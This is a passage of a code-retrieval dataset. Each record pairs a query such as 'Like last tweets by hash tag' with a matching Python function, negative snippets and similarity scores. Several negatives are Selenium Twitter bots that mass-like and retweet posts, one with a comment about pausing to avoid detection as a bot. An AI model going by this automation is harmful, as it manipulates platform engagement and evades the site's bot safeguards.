"def get_actions(self):\n\n if self.description == exceptions.NotAvailableError:\n raise exceptions.NotAvailableError('Can\\'t get actions because a description for this service is'\n ' not available.')\n return list(self.actions.values())",
"def whitelist_json_to_txt(whitelist_json):\n\n ret = []\n if whitelist_json.get('version',None) == '1_0':\n for item in whitelist_json['items']:\n ret.append(whitelist_format.format(gate=item['gate'], trigger=item['trigger_id']))\n\n return ret",
"def parse_menu_items(menu_items: List[dict]) -> List[str]:\n\n def parse_menu_item(menu_item: dict) -> str:\n text = menu_item.get(\"text\").strip()\n\n allergens = menu_item.get(\"allergens\")\n allergen_emojis = []\n if allergens:\n for allergen in allergens:\n allergen_key = allergen.get(\"slug\")\n emoji = ALLERGEN_MAP.get(allergen_key)\n if emoji:\n allergen_emojis.append(emoji)\n\n return f'{text} {\" \".join(allergen_emojis)}'.strip()\n\n handlers = {\n \"menu_title\": lambda text: f\"\\n*{text}*\",\n \"menu_description\": lambda text: f\"*{text}*\",\n \"menu_item\": parse_menu_item,\n }\n\n parsed_items = []\n\n for item in menu_items:\n # acf_fc_layout conveniently tells us how to format each row\n item_type = item.get(\"acf_fc_layout\")\n item_text = item.get(item_type)\n parsed_item = prettify(handlers[item_type](item_text))\n parsed_items.append(parsed_item)\n\n return parsed_items",
"def render(self):\n if self.can_render():\n output = '<ul>'\n for item in self.items:\n output += \"<li>{0}</li>\".format(item)\n return output + '</ul>'\n return ''",
"def getAllHumanActions(self):\n return self.human_policy.actions",
"def get_actions(self):\n actions = []\n for section in self._sections:\n for (sec, action) in self._actions:\n if sec == section:\n actions.append(action)\n\n actions.append(MENU_SEPARATOR)\n return actions",
"def _serialize_submitted_documents(self, item):\n if not item.has_proposal:\n return []\n\n docs = IContentListing(item.proposal.resolve_submitted_documents())\n return [doc.render_link() for doc in docs]",
"def list(self):\n return list(\n filter(\n lambda x: x.get('type') == 'tagit', # pragma: no cover\n self._post(\n request=ApiActions.LIST.value,\n uri=ApiUri.ACTIONS.value,\n ).get('actions')\n )\n )",
"def get_list_html(self, items):\n html = \"\"\"\n <html>\n\t\t\t<head>\n\t\t\t\t<title>OpenFDA Cool App</title>\n\t\t\t</head>\n\t\t\t<body>\n <ol>\n \"\"\"\n\n for item in items:\n html += \"<li>\" + item + \"</li>\\n\"\n\n html += \"\"\"\n </ol>\n\t\t\t</body>\n </html>\n \"\"\"\n\n return html"
] |
[
"0.523548",
"0.5062648",
"0.5057534",
"0.50366926",
"0.48965392",
"0.48873514",
"0.48711312",
"0.48421466",
"0.4839564",
"0.48027083",
"0.47810283",
"0.47803128",
"0.47630978",
"0.4751867",
"0.47392517",
"0.47254217",
"0.46918416",
"0.46840894",
"0.46765396",
"0.4671996",
"0.46668178",
"0.46648702",
"0.46634835",
"0.466275",
"0.46562013",
"0.46468568",
"0.4646797",
"0.46286553",
"0.46201783",
"0.46065512"
] |
0.7828043
|
0
|
Wrap each string element in tag and join the elements.
|
def __convertToHtmlListElement(self, listOfStringValues: List[str]) -> str:
return ''.join(f"<li>{element}</li>" for element in listOfStringValues)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def make_tags(tag, word):\n tag1 = \"<{}>\".format(tag)\n tag2 = \"</{}>\".format(tag)\n final = tag1 + word + tag2\n return final",
"def create_string(element_list):\n \n outstring = '<html><body>'\n \n for element in element_list:\n outstring += html.tostring(element)\n outstring+='</body></html>'\n return outstring",
"def retag_string(self, string, tags):\r\n for (i, tag) in enumerate(tags):\r\n p = '<%s>' % i\r\n string = re.sub(p, tag, string, 1)\r\n return string",
"def join(self, iterable) -> String:\n pass",
"def xmlwrap(cls, message, width):\n parts = []\n tag = None\n for part in cls.tag_re.split(message):\n if not part or part == tag:\n continue\n try:\n tag = cls.tag_re.search(part).group(2)\n parts.append(part)\n except AttributeError:\n tag = None\n parts += cls.whitespace_re.split(part)\n\n lines = [[]]\n size = 0\n for part in parts:\n if part:\n part_len = len(part)\n if size and size + part_len > width:\n lines.append([])\n size = 0\n lines[-1].append(part)\n size += part_len\n return [''.join(parts) for parts in lines]",
"def edit_string_for_tags(tags):\r\n names = []\r\n use_commas = False\r\n for tag in tags:\r\n name = tag.name\r\n if u',' in name:\r\n names.append('\"%s\"' % name)\r\n continue\r\n elif u' ' in name:\r\n if not use_commas:\r\n use_commas = True\r\n names.append(name)\r\n if use_commas:\r\n glue = u', '\r\n else:\r\n glue = u' '\r\n return glue.join(names)",
"def join(self, iterable):\n result = ANSIString(\"\")\n last_item = None\n for item in iterable:\n if last_item is not None:\n result += self._raw_string\n if not isinstance(item, ANSIString):\n item = ANSIString(item)\n result += item\n last_item = item\n return result",
"def _html_tagger(tag: str, attr_pair: tuple = None,\n indentation: str ='', long: bool = False):\n if attr_pair:\n beg = tag + ' {0}={1!r}'.format(*attr_pair)\n else:\n beg = tag\n end = tag\n\n if long:\n def wrap(string):\n return indentation + f'<{beg}>\\n' \\\n + string + '\\n' \\\n + indentation + f'</{end}>'\n else:\n def wrap(string):\n return indentation + f'<{beg}>{string}</{end}>'\n return wrap",
"def join_tags(tags):\n names = []\n delimiter = settings.TAGGIT_SELECTIZE['DELIMITER']\n for tag in tags:\n name = tag.name\n if delimiter in name or ' ' in name:\n names.append('\"%s\"' % name)\n else:\n names.append(name)\n return delimiter.join(sorted(names))",
"def tag(word: str, tags: list):\n open_tags = ['<' + tag + '>' for tag in tags]\n close_tags = ['</' + tag + '>' for tag in reversed(tags)]\n logger.debug('*************** %s ' %\n\n word)\n return ''.join(open_tags) + word + ''.join(close_tags)",
"def wrap(string, left=\"[\", right=\"]\"):\n if string:\n return left+string+right\n return \"\"",
"def _text_of(self, elem):\n if isinstance(elem, Tag):\n text = [ ]\n for sub_elem in elem:\n text.append(self._text_of(sub_elem))\n\n return \" \".join(text)\n else:\n return elem.string",
"def _postprocess(\n self,\n tags: List[str],\n words: List[str],\n pos: bool = False,\n ):\n result = list()\n\n i = 0\n for tag in tags:\n if (\"<\" not in tag) and (\">\" not in tag):\n if pos:\n result.append(f\"{words[i]}/{pos[i]}\")\n else:\n result.append(words[i])\n i += 1\n else:\n result.append(tag)\n\n return \" \".join(result)",
"def join_list(items: Iterable[str]) -> str:\n\n return ITEM_SEPARATOR.join(items)",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += \", \" + string\n return out",
"def openCloseTag ( x, text ):\n assert str(type(x)) == \"<type 'str'>\"\n assert str(type(text)) == \"<type 'str'>\"\n tag = \"<\" + str ( x ) + \">\" + text + \"</\" + str ( x ) + \">\"\n assert str ( type ( tag ) ) == \"<type 'str'>\"\n return tag",
"def _postprocess(self, tags: List[str], words: List[str], pos: List[str]):\n result = list()\n\n i = 0\n for tag in tags:\n if (\"<\" not in tag) and (\">\" not in tag):\n if pos:\n result.append(f\"{words[i]}/{pos[i]}\")\n else:\n result.append(words[i])\n i += 1\n else:\n result.append(tag)\n\n return \" \".join(result)",
"def concat_text(self, elem):\n\n s = u\" \".join([ frag.strip() for frag in elem.itertext() if re.search(\"\\S\", frag) ]) \n return re.sub(\" (\\W )\", \"\\\\1\", s)",
"def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += string.join(\", \")\n return out",
"def surround(inp):\r\n if inp is list:\r\n for i in range(len(inp)):\r\n inp[i] = \"'\"+str(inp[i])+\"'\"\r\n return inp\r\n return \"'\"+str(inp)+\"'\"",
"def my_join(iters, string):\n out = \"\"\n for i in range(iters):\n out += \",\" + string \n return out",
"def stringiter_combine(flt_ctxt, in_objs):\n return ('stringiter',\n chain(*tuple(o('stringiter', protect_safe=True) for o in in_objs)))",
"def _result(self, depth, elements, wrapped, left='[', right=']'):\n if not wrapped:\n return left + ', '.join(elements) + right\n else:\n spaces = (depth * self.indent) * ' '\n first = left + '\\n' + spaces\n sep = ',\\n' + spaces\n #last = '\\n' + spaces[:-indent] + right # K&R\n last = right # Lisp\n return first + sep.join(elements) + last",
"def wrap_always(text, width):\n\n if type(text) is str:\n return '\\n'.join([ text[width*i:width*(i+1)] for i in xrange(int(math.ceil(1.*len(text)/width))) ])\n elif type(text) is list:\n\n new_text = ''\n counter = 0\n for e in text:\n counter += 1\n new_text += '('+str(counter)+') '+str(e)+\"\\n\"\n #new_text = ''.join(str(e) for e in text)\n return '\\n'.join([ new_text[width*i:width*(i+1)] for i in xrange(int(math.ceil(1.*len(new_text)/width))) ])",
"def wrap_tagged_text(text, count=0):\n # break only on white space, ignoring label breaks\n wrapped_text = text\n if count <= 0:\n return text\n divs = [\n split_chunk(chunk) for chunk in split_tagged_text_into_chunks(text)\n ]\n # total_length = sum([len(div.text) for div in divs]) # UNUSED\n total_string = \"\".join([div.text for div in divs])\n final_nl_b = total_string.endswith(\"\\n\")\n total_lines = total_string.splitlines()\n wrapped_s = \"\\n\".join(\n [textwrap.fill(s, count) for s in total_lines]\n ) + (\"\\n\" if final_nl_b else \"\")\n # now have to map the wrapped_string to the divs!\n insert_pts = []\n divx = x = tl = wi = 0\n div = divs[divx]\n dl = len(div.text)\n for tsc in total_string:\n if wrapped_s[wi] != tsc:\n insert_pts.append([wi, divx, x, tl + x, tsc.isspace()])\n if not tsc.isspace():\n wi += 1\n wi += 1\n x += 1\n if x >= dl:\n tl += dl\n x = 0\n divx += 1\n try:\n div = divs[divx]\n if div:\n try:\n dl = len(div.text)\n except AttributeError:\n pass\n except IndexError:\n pass\n if insert_pts:\n divs_l = [list(div) for div in divs]\n for ipt in insert_pts[::-1]:\n _, divx, x, _, sp = ipt\n divs_l[divx][TEXT] = \"{0}\\n{1}\".format(\n divs[divx][TEXT][:x],\n divs[divx][TEXT][x + 1 if sp else x:],\n )\n divs_t = [Chunk(*div) for div in divs_l]\n chunks = [\n (\n \"<t {0}>{1}</t>\".format(div.attrs, div.text)\n if div.attrs\n else div.text\n )\n for div in divs_t\n if div and div.text\n ]\n wrapped_text = \"\".join(chunks)\n return wrapped_text",
"def stringify(element, newlines=True):\n\n def stop_if(e):\n return isinstance(e, (DefinitionList, Cite))\n\n def attach_str(e, doc, answer):\n if hasattr(e, 'text'):\n ans = e.text\n elif isinstance(e, HorizontalSpaces):\n ans = ' '\n elif isinstance(e, VerticalSpaces) and newlines:\n ans = '\\n\\n'\n elif type(e) == DefinitionList:\n ans = []\n for item in e.content:\n term = ''.join(stringify(part) for part in item.term)\n definitions = '; '.join(stringify(defn) for defn in item.definitions)\n ans.append(f'- {term}: {definitions}')\n ans = '\\n'.join(ans)\n elif type(e) == Cite:\n ans = stringify(e.content)\n else:\n ans = ''\n\n # Add quotes around the contents of Quoted()\n if type(e.parent) == Quoted:\n if e.index == 0:\n ans = '\"' + ans\n if e.index == len(e.container) - 1:\n ans += '\"'\n\n answer.append(ans)\n\n answer = []\n f = partial(attach_str, answer=answer)\n element.walk(f, stop_if=stop_if)\n return ''.join(answer)",
"def itag_of_soup(soup):\n if isinstance(soup, bs4.element.NavigableString):\n return str(soup)\n to_return = Tag([itag_of_soup(content) for content in soup.contents])\n to_return.soup = soup\n return to_return",
"def flatten(*args: Strings) -> List[str]:\n return list(each_string(*args))",
"def escape_list(l):\n return [_escape_harlowe_html(item) if isinstance(item, text_type) else str(item) for item in l]",
"def add_smart_quotes(article: Article) -> Article:\n text_tag: bs4.NavigableString\n for text_tag in article.content.find_all(text=True):\n #\\1 will sub in the first matched group\n new_tag = re.sub(r'\"([^\"]*)\"', r'“\\1”', text_tag)\n text_tag.replace_with(new_tag)\n return article"
] |
[
"0.5969318",
"0.5911578",
"0.58806515",
"0.5838043",
"0.5793163",
"0.5753264",
"0.5704033",
"0.5701071",
"0.56826556",
"0.55926114",
"0.5556637",
"0.55514723",
"0.5513206",
"0.5507362",
"0.54939824",
"0.5471039",
"0.54170644",
"0.5402638",
"0.5396076",
"0.53810865",
"0.5355535",
"0.53028667",
"0.52947277",
"0.5292037",
"0.5278109",
"0.52493083",
"0.52466464",
"0.52417725",
"0.523058",
"0.5229855"
] |
0.6051207
|
0
|
Check if the health event contains RCA or not.
|
def __isNotRcaEvent(self, event: Dict) -> bool:
if HEALTH_EVENT_TYPE in event[PROPERTIES] and event[PROPERTIES][HEALTH_EVENT_TYPE].upper() == RCA:
return False
if RECOMMENDED_ACTIONS_CONTENT in event[PROPERTIES]:
return False
return True
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def check_rpt_status(self) -> bool:\n return self.allele == self.fasta_alt",
"def cca(self):\n return self._current_rx_count == 0",
"def verifyActionCenterRts():\n pass",
"def is_rova_area(self):\n url = 'https://www.rova.nl/api/waste-calendar/upcoming'\n\n # request data from rova API and check if garbage is collected at this address\n # requesting with a non-existing postalcode will result in a error message\n\n response = requests.get(url, params={\n 'postalcode': self.zip_code,\n 'houseNumber': self.house_number,\n 'addition': self.house_addition,\n 'take': '1',\n })\n\n response.raise_for_status()\n\n rova_response = response.text.strip()\n if rova_response != '[]':\n rova_response = \"OK\"\n return rova_response == \"OK\"",
"def check_event_status(self):\n pass",
"def check_ca(self):\n return m2.x509_check_ca(self.x509)",
"def testHealthAssessRash(self):\n attr = self.session.create_visit_attr()\n\n self.util.boolTypeTest(self, attr, \"rash\")\n\n self.util.boolPropertyTest(self, attr, \"rash\")",
"def verify_aggC1(self):\n self.c.execute('''SELECT aggCode, aggC1\n FROM Agglomerations\n WHERE aggState = 1 AND ((aggC1) IS NULL OR (aggC1)>100 OR (aggC1)<0)\n ''')\n res = self.c.fetchall()\n if (len(res) > 0):\n return [False,\n \"In the agglomeration '%s' that has the aggState equal to 1 the reported aggC1 '%s' is incorrect\",\n res]\n else:\n return [True]",
"def report_health(self):\n return True",
"def validate(self) -> bool:\n # Call RH for the collector VM. If the call is successful, the collector VM has been assigned the right roles.\n collectorVM = AzureInstanceMetadataService.getComputeInstance(\n self.tracer, self.name)\n collectorVMArmId = ARM_ID_TEMPLATE % (\n collectorVM[SUBSCRIPTION_ID], collectorVM[RESOURCE_GROUP_NAME], collectorVM[NAME])\n rhClient = ResourceHealth(self.tracer)\n try:\n rhEvents = rhClient.getHistoricalResourceAvailabilityEvents(\n self.ctx.authToken, collectorVMArmId)\n except Exception as e:\n self.tracer.error(\n \"[%s] RH call validation failed(%s).\", self.fullName, e, exc_info=True)\n return False\n\n return True",
"def is_red_car(self):\n return self.identifier == 18",
"def sanity_check(self):\n res = True\n res = res and self.detected\n res = res and np.sum(self.diffs) < 30000 # experimental value\n return res",
"def _is_this_healthy_rDNA(self):\n if self.length < 3000:\n return 0\n mapping_state = []\n for item in self.sam_summary:\n if item[1] != '0':\n mapping_state.append(1)\n else:\n mapping_state.append(0)\n threshold = 0.8\n if sum(mapping_state)/len(mapping_state) > threshold:\n return 1\n else:\n for i in range(1, len(mapping_state) - 50):\n if sum(mapping_state[i:])/len(mapping_state[i:]) > threshold or \\\n sum(mapping_state[:-i])/len(mapping_state[:-i]) > threshold:\n healthy = 2\n return 0",
"def testHealthAssessArthralgia(self):\n attr = self.session.create_visit_attr()\n\n self.util.boolTypeTest(self, attr, \"arthralgia\")\n\n self.util.boolPropertyTest(self, attr, \"arthralgia\")",
"def is_contagious(self):\n if self.health >= 0 and self.health <= 49:\n return True\n elif self.health >= 50 and self.health <= 100:\n return False",
"def check(self, image):\n return get_hist_corr(self.image, image) >= self.THRESHOLD",
"def wantsReadEvent(self):\r\n if self.result != None:\r\n return self.result == 0\r\n return None",
"def stat_cartridge_health(self):\n raise NotImplementedError",
"def is_CA(self):\n\n basicConstraints = self.get_basicConstraints()\n return basicConstraints is not None and basicConstraints[0]",
"def _check_rac_crs(cfg, warning=None, critical=None):\n bin_name = \"crsctl\"\n _check_attrs(cfg, [\"oh\", ])\n\n bin_name = os.path.join(cfg.oh, \"bin\", bin_name)\n try:\n args = bin_name + \" check crs\"\n cp = subprocess.run(args, shell=True, check=True, stdout=subprocess.PIPE)\n if cp.stdout is None:\n print(\"None result from crsctl\")\n return UNKNOWN\n out = str(cp.stdout, \"utf-8\")\n for l in out.split(os.linesep):\n if l.lstrip().rstrip() == \"\":\n continue\n if not l.lstrip().rstrip().endswith(\"is online\"):\n print(l)\n return CRITICAL\n print(out)\n return OK\n except subprocess.CalledProcessError as err:\n print(err.output)\n return UNKNOWN",
"def check_health(self):\n return defer.succeed(True)",
"def data_checker(xml):\n if not xml or 'response code=\"102\"' in xml:\n LOGGER.debug(\"The service 'oclc' is temporarily down!\")\n return False\n return True",
"def check_needs_escalation(self, escalation_time: timedelta, event: EventRecord) -> bool:\n oldest_event = self.get_oldest_event_with_fingerprint(event.fingerprint)\n\n if not oldest_event:\n return False\n\n return oldest_event.received_at <= datetime.utcnow() - escalation_time",
"def isProteic(self):\n from MolKit.PDBresidueNames import AAnames\n\n self.AARes = [x for x in self.residues if x.type in AAnames]\n\n water = [x for x in self.residues if x.type in ['HOH', 'WAT']]\n\n if len(self.AARes) and len(self.AARes)+len(water) == len(self.residues):\n return True\n else:\n return False",
"def is_covered(self):\n return self.has_cover",
"def test_check_cds_18(self):\n self.cds1.gene = \"A\"\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\", \"warning\")\n self.assertEqual(count, 2)",
"def have_cdc() -> bool:",
"def consensus_reached(self):\n pos, com, success = self.perception\n if len(com) > 0 and self.time > 1:\n return all(map(lambda x: x[1][\"consensus\"], com)) and self.consensus\n else:\n return True",
"def needs_run(self, cscan, xnat):\n _info = cscan.info()\n if _info['type'] not in self.scan_types:\n return False\n\n # Check for existing EDAT resource\n if XnatUtils.has_resource(cscan, 'EDAT'):\n LOGGER.debug('Has EDAT')\n return False\n\n return True",
"def check_valid_request_ca(self):\n\n self.check_valid_request_common()\n\n alg = self.get_POW().getSignatureAlgorithm()\n bc = self.get_POW().getBasicConstraints()\n eku = self.get_POW().getEKU()\n sia = self.get_POW().getSIA()\n\n if alg != rpki.oids.sha256WithRSAEncryption:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 has bad signature algorithm for CA: %s\" % alg)\n\n if bc is None or not bc[0] or bc[1] is not None:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA bad basicConstraints\")\n\n if eku is not None:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA EKU not allowed\")\n\n if sia is None:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA missing\")\n\n caRepository, rpkiManifest, signedObject, rpkiNotify = sia\n\n logger.debug(\"check_valid_request_ca(): sia: %r\", sia)\n\n if signedObject:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA must not have id-ad-signedObject\")\n\n if not caRepository:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA must have id-ad-caRepository\")\n\n if not any(uri.startswith(\"rsync://\") for uri in caRepository):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-caRepository contains no rsync URIs\")\n\n if any(uri.startswith(\"rsync://\") and not uri.endswith(\"/\") for uri in caRepository):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-caRepository does not end with slash\")\n\n if not rpkiManifest:\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA must have id-ad-rpkiManifest\")\n\n if not any(uri.startswith(\"rsync://\") for uri in rpkiManifest):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-rpkiManifest contains no rsync URIs\")\n\n if any(uri.startswith(\"rsync://\") and uri.endswith(\"/\") for uri in rpkiManifest):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-rpkiManifest ends with slash\")\n\n if any(not uri.startswith(\"http://\") and not uri.startswith(\"https://\") for uri in rpkiNotify):\n raise rpki.exceptions.BadPKCS10(\"PKCS #10 CA SIA id-ad-rpkiNotify neither HTTP nor HTTPS\")"
] |
[
"0.5812587",
"0.5784343",
"0.56178385",
"0.5605711",
"0.5595467",
"0.5586229",
"0.5520362",
"0.5406098",
"0.5375033",
"0.5367486",
"0.5329484",
"0.5310734",
"0.53074825",
"0.53060085",
"0.5291778",
"0.52247566",
"0.5207978",
"0.5182046",
"0.5182002",
"0.5172207",
"0.5151738",
"0.51460433",
"0.51059294",
"0.5097097",
"0.5094065",
"0.5087749",
"0.5070114",
"0.50647765",
"0.5053695",
"0.5052985"
] |
0.73898304
|
0
|
Like last tweets by hash tag
|
def like_tweet(self, tag):
self.bot.get('https://twitter.com/search?q=' + tag + '&src=typed')
self.__wait(3, 3)
for i in range(1, 3):
self.bot.execute_script('window.scrollTo(0,document.body.scrollHeight)')
self.__wait(2, 3)
tweets = self.bot.find_elements_by_tag_name('article')
links = []
for tweet in tweets:
sub_links = tweet.find_elements_by_tag_name('a')
links += [sub_link.get_attribute('href')
for sub_link in sub_links if 'status' in sub_link.get_attribute('href')]
print('Started to like {} tweets'.format(len(links)))
for link in links:
self.bot.get(link)
self.__wait(3, 5)
likes = self.bot.find_elements_by_css_selector('div[data-testid="like"')
for like in likes:
like.click()
self.__wait(3, 5)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def analyze_hashtag(self, hashtag, count=200):\n tweets = []\n\n for x in xrange(0, int(count / 100)):\n tweets.extend(self.tweet_fetcher.get_tweets(hashtag))\n\n analyzed_tweets = sort_tweets(self.sa.classify(tweets))\n\n self.analyzed_tweets = analyzed_tweets\n\n return analyzed_tweets",
"def filter_by_hashtag(tweets: list, hashtag: str) -> list:\n tweets_with_hashtag = {} # findall(): Kui tekstis on rohkem kui üks regulaaravaldisele vastav alamsõne saab kõikide vastete järjendi moodustada funktsiooniga findall()\n pattern = r\"#\\w+\" # \\w : tähed, numbrid, alakriips, + : 1 või rohkem\n for tweet in tweets: # r\"string\" on \"raw\" tüüpi string, mis tähendab, et kurakaldkriipsud(\"\\\") jäetakse teksti alles.\n find_hashtag = re.findall(pattern, tweet.content) # word:\\w\\w\\w. Regulaaravaldisele vastab täpne sõne \"word:\" ning sellele järgnevad 3 suvalist tähte.\n if find_hashtag:\n tweets_with_hashtag.setdefault(ht, []).append(tweet)\n return tweets_with_hashtag[hashtag]",
"def search_hashtag(self):\n hashtag = get_random_hashtag()\n self.driver.get(\n '{}/explore/tags/{}'.format(self.base_url, hashtag))\n time.sleep(2)\n\n # mimic a scroll\n scroll_helper(510, self.driver)\n time.sleep(1)\n scroll_helper(600, self.driver)\n time.sleep(1)\n\n # Get a random pic to like\n random_pic = self.driver.find_elements_by_xpath(\n \"//a[contains(@href, '/p/')]\")[randint(5, 40)]\n self.driver.get(random_pic.get_attribute(\"href\"))\n\n # Scroll like button into view and click it\n time.sleep(3)\n scroll_helper(500, self.driver)\n self.like_photo()\n\n # Retrun bot to homepage after clicking like\n time.sleep(0.5)\n self.driver.get(self.base_url)",
"def get_tweets(hashtag):\n api = twitter.Api(consumer_key=TWITTER_API_CONSUMER_KEY,\n consumer_secret=TWITTER_API_CONSUMER_SECRET,\n access_token_key=TWITTER_API_ACCESS_TOKEN_KEY,\n access_token_secret=TWITTER_API_ACCESS_TOKEN_SECRET)\n\n query = (f\"q=%23{HASHTAG}%20-RT\"\n f\"&result_type=recent&since=2019-01-01&count={NUM_TWEETS}\")\n results = api.GetSearch(raw_query=query)\n\n return [\n format_tweet(tweet.AsDict())\n for tweet in results\n ]",
"def handle_hashtags_tweets_for_date(current_date, current_hashtag):\n\n hashtags_tweets = current_hashtag.tweets.filter(save_date=current_date).distinct()\n hashtags_tweets_list = [hashtags_tweet for hashtags_tweet in hashtags_tweets]\n hashtags_tweets_list.sort(key=lambda tweet: (tweet.retweets, tweet.likes), reverse=True)\n hashtags_tweets_list = hashtags_tweets_list[:10]\n hashtags_tweets_chart = PlotPainter.plot_tweets(hashtags_tweets_list) if hashtags_tweets else None\n return hashtags_tweets_chart, hashtags_tweets_list",
"def handle_current_hashtag(api_pipeline, current_hashtag):\n\n current_hashtag_saved_tweets = current_hashtag.tweets.all()\n hashtags_tweets = api_pipeline.get_recent_tweets_for_hashtag(current_hashtag.text, how_many=5)\n for hashtags_tweet in hashtags_tweets:\n if hashtags_tweet not in current_hashtag_saved_tweets.filter(save_date=datetime.datetime.today().date()):\n hashtags_tweet.save()\n current_hashtag.tweets.add(hashtags_tweet)\n current_hashtag.save()\n hashtags_tweets.sort(key=lambda tweet: (tweet.retweets, tweet.likes), reverse=True)\n hashtags_tweets_chart = PlotPainter.plot_tweets(hashtags_tweets) if hashtags_tweets else None\n return hashtags_tweets, hashtags_tweets_chart",
"async def tags(self, ctx, tag=None):\r\n\t\tnum = 0\r\n\t\tTags = self.settings.ServerConfig(ctx.guild.id, 'Tags')\r\n\t\tfuz = self.bot.get_cog('FuzzySearch')\r\n\t\tif not fuz:\r\n\t\t\treturn await ctx.send('Can\\'t find FuzzySearch Cog')\r\n\r\n\t\tRes = fuz.fuzSearch(ctx, tag, Tags)\r\n\r\n\t\t\t\t\r\n\t\tif ctx.author.top_role.colour:\r\n\t\t\tcol = ctx.author.top_role.colour\r\n\t\telse:\r\n\t\t\tcol =self.settings.randomColor()\r\n\r\n\t\tembed = discord.Embed(\r\n\t\t\ttitle = Res[num],\r\n\t\t\tdescription = Tags[Res]['data'],\r\n\t\t\tcolour = col\r\n\t\t)\r\n\t\tembed.set_footer(text='Last Edited {}'.format(Tags[Res]['time']))\r\n\t\tawait ctx.send(embed=embed)",
"def get_hashtags(self):\n\t\t# Only first level comments should be checked for hashtag. Maybe.\n\t\tpassl",
"def filter_tweets(tweets):\n # We keep only tweets by chrisalbon with pictures\n search_tweets = [tw for tw in tweets if tw['username'] == '@chrisalbon' and len(tw['images']) > 0]\n # He made multiple tweets on the same topic, we keep only the most recent tweets\n # We use the indexes of the reversed tweet list and dictionnaries to keep only key \n unique_search_index = sorted(list({t['text'].lower():i for i,t in list(enumerate(search_tweets))[::-1]}.values()))\n unique_search_tweets = [search_tweets[i] for i in unique_search_index]\n\n # Keep non-downloaded tweets\n most_recent_file = sorted([datetime.datetime.fromtimestamp(os.path.getmtime(path)) \n for path in glob.glob(\"./downloaded_pics/*.jpg\")], reverse=True)[0]\n recent_seach_tweets = [tw for tw in unique_search_tweets if tw['date'] > most_recent_file]\n\n # Uncomment for testing new tweets\n # recent_seach_tweets = [tw for tw in unique_search_tweets if tw['date'] > datetime.datetime(2017, 7, 6, 13, 41, 48)]\n return recent_seach_tweets",
"def readHashtags():\n next_max_id = True\n reader = HashtagReader()\n while next_max_id:\n if next_max_id is True:\n next_max_id = ''\n _ = api.getUserFeed(usernameId=userId, maxid=next_max_id)\n reader.items.extend(api.LastJson.get('items', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n reader.checkBannedTags()\n reader.printHashtagsDict()",
"def get_hashtag_info(self, hashtag):\n uri = 'hashtags/' + hashtag\n return self.make_request(uri)",
"def hashtag(id):\n if (len(id) > 1):\n print \"El hashtag no pot tenir espais\"\n return\n\n id = id[0]\n if (id in i.getHashtags()):\n print \"Aquest hashtag ja existeix\"\n\n i.afegeixHashtag(id)",
"def buildHashtagsDict(tweets):\n hashtags = {}\n for tweet in tweets:\n if tweet['entities']['hashtags']:\n for hashtag in tweet['entities']['hashtags']:\n tag = hashtag['text'].lower().strip()\n if tag not in hashtags:\n hashtags[tag] = 1\n else:\n hashtags[tag] += 1\n return hashtags",
"def like_retweet(self):\n \n bot = self.bot \n logging.debug('Get Hashtag')\n hashtag = Twitterbot.getHashtags(self)\n logging.debug('Bot for Like_retweet initalized')\n # fetches the latest tweets with the provided hashtag \n bot.get( \n 'https://twitter.com/search?q=%23'+hashtag+'&src=trend_click&vertical=trends'\n ) \n \n time.sleep(3) \n \n # using set so that only unique links \n # are present and to avoid unnecessary repetition \n links = set() \n \n # obtaining the links of the tweets \n for _ in range(3): \n # executing javascript code \n # to scroll the webpage \n bot.execute_script( \n 'window.scrollTo(0, document.body.scrollHeight)'\n ) \n \n time.sleep(4) \n \n # using list comprehension \n # for adding all the tweets link to the set \n # this particular piece of code might \n # look very complicated but the only reason \n # I opted for list comprehension because is \n # lot faster than traditional loops \n [ \n links.add(elem.get_attribute('href')) \n for elem in bot.find_elements_by_xpath(\"//a[@dir ='auto']\") \n ] \n i = 0\n # traversing through the generated links \n for link in links:\n #Nothing for the Hashtag was found, another run is required\n #if len(links ==6):\n # break\n # Twitterbot.like_retweet(self)\n # opens individual links \n #print(len(links))\n bot.get(link) \n time.sleep(4)\n if i == 3:\n break\n i += 1\n try: \n # retweet button selector \n bot.find_element_by_css_selector( \n '.css-18t94o4[data-testid =\"retweet\"]'\n ).click() \n # initializes action chain \n actions = ActionChains(bot) \n # sends RETURN key to retweet without comment \n actions.send_keys(Keys.RETURN).perform() \n \n # like button selector \n bot.find_element_by_css_selector( \n '.css-18t94o4[data-testid =\"like\"]'\n ).click() \n # adding higher sleep time to avoid \n # getting detected as bot by twitter \n logging.info(f'Liked and retweeted:\"{link}\"')\n time.sleep(10) \n except: \n time.sleep(2) \n \n # fetches the main homepage \n bot.get('https://twitter.com/')",
"def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags",
"def getByHashtags(hashtag):\n\n # set page_limits. The default is 1 \n pages_limit = request.args.get('pages_limit') or 1\n pages_limit = int(pages_limit)\n\n raw_response = get_response(tw_api, 'search/tweets', { 'q': '#' + hashtag, 'count': 100 }, pages_limit)\n list_response = convert_resp2list(raw_response)\n return jsonify(list_response)",
